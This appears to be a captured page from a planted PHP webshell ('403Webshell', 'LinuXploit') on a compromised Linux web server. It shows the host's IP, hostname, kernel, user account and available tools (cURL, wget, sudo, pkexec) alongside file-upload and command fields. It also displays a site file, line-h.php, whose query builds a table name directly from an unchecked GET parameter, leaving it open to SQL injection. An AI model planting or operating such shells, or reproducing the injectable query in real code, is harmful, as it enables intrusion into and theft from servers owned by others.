403Webshell
Server IP : 93.86.61.54  /  Your IP : 216.73.216.60
Web Server : Apache/2.4.62 (Ubuntu)
System : Linux rasin.ddns.net 6.8.0-124-generic #124~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 21:05:19 UTC x86_64
User : www-data ( 33)
PHP Version : 8.4.22
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/projects/meteoca/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/projects/meteoca/line-h.php
<?php
/******************************
 Project: MeteoCA, 2017-2020
 Version: PHP-7
 Author : M. Kukic
 Note   :  
******************************/
//
include "config.php";
include('phpgraphlib.php');

$dt = $_GET["dt"];
//
    $sql = "SELECT * FROM datatim_".$dt." ORDER BY tim ASC";
    $result = mysqli_query($dbh, $sql) or die(mysqli_error());
    $numofrows = mysqli_num_rows($result);
		
			for ($i = 1; $i < ($numofrows+1); $i=$i+3) { 
			$row = mysqli_fetch_array($result);
			$data[$row['tim']]=round($row['humi'],0);
			$row = mysqli_fetch_array($result);
			$row = mysqli_fetch_array($result);
			}
			
$graph = new PHPGraphLib(960,320);
$graph->addData($data);
$graph->setupXAxis(18);
$graph->setTitle('Relativna vlaznost vazduha [%]');
$graph->setBars(false);
$graph->setLine(true);
$graph->setDataPoints(true);
$graph->setDataPointColor('green');
$graph->setDataValues(true);
$graph->setDataValueColor('green');
$graph->setGoalLine(0);
$graph->setGoalLineColor('red');
$graph->setDataPointSize(4);
$graph->createGraph();

?>

Youez - 2016 - github.com/yon3zu
LinuXploit